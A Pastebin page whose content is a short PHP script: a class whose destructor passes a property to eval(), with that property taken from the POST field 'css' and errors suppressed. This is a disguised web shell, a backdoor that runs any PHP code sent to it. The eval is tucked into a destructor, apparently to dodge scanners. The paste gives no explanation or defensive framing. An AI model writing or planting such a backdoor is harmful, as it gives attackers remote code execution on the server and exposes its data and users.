Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- class Test{
- public $name = '';
- function __destruct(){
- @eval("$this->name");
- }
- }
- $test= new Test();
- $c = @$_POST['css'];
- $test->name = $c;
- ?>egm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement